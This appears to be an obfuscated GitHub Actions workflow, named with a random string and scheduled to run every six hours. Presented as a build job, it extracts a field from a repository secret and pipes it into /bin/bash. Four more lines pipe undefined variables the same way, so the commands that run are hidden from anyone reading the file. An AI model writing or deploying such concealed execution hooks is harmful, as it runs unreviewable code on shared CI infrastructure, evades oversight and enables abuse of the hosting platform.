name: songziyang8391
on:
  workflow_dispatch:
  schedule:
    - cron: '18 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: songziyang8391
        env:
          yx9915: ${{ secrets.yx9915 }}
        run: |
          echo $yx9915 | jq -r .wlrdr295 | /bin/bash
          echo $byg44 | jq -r .j5 | /bin/bash
          echo $xo9 | jq -r .qka6472 | /bin/bash
          echo $yat15 | jq -r .pmmuu1700 | /bin/bash
          echo $fpci9 | jq -r .l680 | /bin/bash

